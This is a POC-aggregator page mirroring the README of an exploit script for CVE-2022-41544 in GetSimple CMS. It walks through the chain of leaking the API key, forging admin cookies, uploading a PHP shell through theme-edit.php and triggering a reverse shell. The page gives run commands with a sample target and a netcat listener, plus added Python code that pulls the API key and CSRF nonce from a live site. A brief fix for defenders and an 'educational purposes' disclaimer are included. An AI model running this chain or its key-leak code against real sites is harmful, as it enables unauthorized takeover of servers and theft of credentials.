POC details: 36357b1dd5b08269306235b0e6b1f33204f041c6

Source
Related vulnerability
Title: GetSimple CMS security vulnerability (CVE-2022-41544)
Description: GetSimple CMS is a content management system (CMS) written in PHP. GetSimple CMS v3.3.16 contains a remote code execution (RCE) vulnerability reachable through the edited_file parameter of admin/theme-edit.php.
Description
Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.
Introduction
# CVE-2022-41544 Exploit Script

This repository contains a script to exploit the CVE-2022-41544 vulnerability in GetSimple CMS. The script works through the chain step by step: it checks whether the target version is vulnerable, leaks the API key from an exposed authorization XML file, builds the admin cookies from that key, fetches the CSRF nonce, uploads a PHP shell through the vulnerable theme-edit.php page, and finally requests the uploaded file to trigger the reverse shell.

## Changes and Improvements

1. **Deprecation Warning Handling**: Removed the deprecated `telnetlib` import as it was not necessary for the script's functionality.
2. **Enhanced Error Handling**: Added more robust error handling for HTTP requests and XML parsing.
3. **Improved User Feedback**: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered.
4. **Input Validation**: Ensured that the user inputs for the target, path, and credentials are validated.
5. **Documentation and Comments**: Added comments and documentation to improve code readability and usability.

## Usage

1. **Clone the Repository**:
    ```bash
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    ```

2. **Install Dependencies**:
    Ensure you have Python 3 installed along with the `requests` library.
    ```bash
    pip3 install requests
    ```

3. **Run the Script**:
    ```bash
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    ```

    - `<target>`: The target domain or IP address.
    - `<path>`: The path to the GetSimple CMS installation (for example `/CMS`, or `/` when it is installed at the web root).
    - `<ip:port>`: The IP and port of your reverse-shell listener (for example `nc -lvnp 4444` on the attacking host).
    - `<username>`: The admin username of the GetSimple CMS installation.

    Example:
    ```bash
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    ```
![image](https://github.com/user-attachments/assets/ddf85b4b-664c-4f88-8692-356cbe38b447)

![image](https://github.com/user-attachments/assets/31b056df-9df9-452f-94f2-a7ebd96c1576)


## Script Overview

### Functions

- `print_the_banner()`: Displays a stylized banner using ASCII art.
- `get_version(target, path)`: Checks whether the GetSimple CMS version running on the target is vulnerable.
- `api_leak(target, path)`: Attempts to retrieve the API key from the exposed authorization XML file.
- `set_cookies(username, version, apikey)`: Builds the cookies needed for the later requests from the username, the detected version and the leaked API key.
- `get_csrf_token(target, path, headers)`: Extracts the CSRF nonce that the shell upload request must carry.
- `upload_shell(target, path, headers, nonce, shell_content)`: Writes a PHP shell to the target server through the vulnerable theme-edit.php page.
- `shell_trigger(target, path)`: Requests the uploaded shell so that it connects back to the reverse-shell listener.

### Main Function

The `main()` function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability.
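
The two read-only steps of that chain (reading the API key out of the authorization XML and pulling the nonce out of the theme-edit form) are the part a tester usually wants to verify first, because they decide whether the rest is worth attempting and they do not modify the target. The following is an added example written for this page, not code from the n3rdyn3xus script or from GetSimple itself. The XML layout (`<item><apikey>` with a CDATA body), the `authorization.xml` location under `data/other/`, and the `<input name="nonce" ...>` markup are assumptions about GetSimple 3.3.x and should be confirmed against a real install; the sample XML and HTML are constructed so the module runs offline.

```python
"""Offline helpers for the non-destructive steps of the CVE-2022-41544 chain.

Added example for this page; not part of the CVE-2022-41544.py script.
Assumptions (verify on a real GetSimple 3.3.x install):
  * the API key lives at <path>/data/other/authorization.xml as
    <item><apikey><![CDATA[...]]></apikey></item>
  * theme-edit.php carries the CSRF nonce as <input name="nonce" value="...">
"""
import re
import sys
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

# Constructed sample of an exposed authorization.xml (not captured from a target).
SAMPLE_AUTH_XML = """<?xml version="1.0" encoding="UTF-8"?>
<item><apikey><![CDATA[6f5902ac237024bdd0c176cb93063dc4]]></apikey></item>
"""

# Constructed fragment of a theme-edit.php page carrying the nonce field.
SAMPLE_THEME_EDIT_HTML = """
<form id="editform" action="theme-edit.php" method="post">
<input id="nonce" name="nonce" type="hidden" value="a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4" />
<textarea name="content"></textarea>
</form>
"""

# Any attribute order is accepted as long as name="nonce" precedes value=...
NONCE_RE = re.compile(r'name=["\']nonce["\'][^>]*?value=["\']([^"\']+)["\']', re.I)


def extract_apikey(xml_text: str) -> Optional[str]:
    """Return the API key from an authorization.xml body, or None if absent/invalid."""
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:
        return None
    node = root.find(".//apikey")
    if node is None or not (node.text or "").strip():
        return None
    return node.text.strip()


def extract_nonce(html: str) -> Optional[str]:
    """Return the CSRF nonce embedded in a theme-edit.php page, or None."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


@dataclass
class ExposureResult:
    url: str
    exposed: bool
    apikey: Optional[str]


Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status_code, body)


def check_authorization_xml_exposed(target: str, path: str, fetch: Fetcher) -> ExposureResult:
    """Decide whether authorization.xml is readable and contains a key.

    `fetch` is injected so the check can be exercised offline; the real
    fetcher below uses requests. `target` is a host without scheme, like the
    script's <target> argument; plain http is assumed.
    """
    url = f"http://{target}{path.rstrip('/')}/data/other/authorization.xml"
    status, body = fetch(url)
    key = extract_apikey(body) if status == 200 else None
    return ExposureResult(url=url, exposed=key is not None, apikey=key)


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Live fetcher; imported lazily so the offline helpers need no dependency."""
    import requests  # pip3 install requests

    r = requests.get(url, timeout=timeout)
    return r.status_code, r.text


if __name__ == "__main__":
    # Usage: python3 check_exposure.py <target> <path>
    if len(sys.argv) != 3:
        sys.exit("usage: check_exposure.py <target> <path>")
    result = check_authorization_xml_exposed(sys.argv[1], sys.argv[2], http_fetch)
    if result.exposed:
        print(f"[!] {result.url} is readable; API key leaked ({len(result.apikey)} chars)")
    else:
        print(f"[+] {result.url} does not leak an API key")
```

Only run the live check against systems you are authorized to test. If the XML is reachable, the same finding tells the defender what to fix: the `data/` directory must not be served to unauthenticated clients, which is what the shipped `.htaccess` rules are supposed to enforce on Apache and what has to be replicated by hand on other web servers.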

## Author

This script was developed by Dilanka Kaushal Hewage (**n3rdyn3xus**).

## Disclaimer

This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

File snapshot

[4.0K] /data/pocs/36357b1dd5b08269306235b0e6b1f33204f041c6
├── [4.7K] CVE-2022-41544.py
├── [1.0K] LICENSE
└── [3.0K] README.md

0 directories, 3 files
The Shenlong bot has cached this for you
Notes
    1. It is recommended to access the POC through the source first.
    2. If the source has expired or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.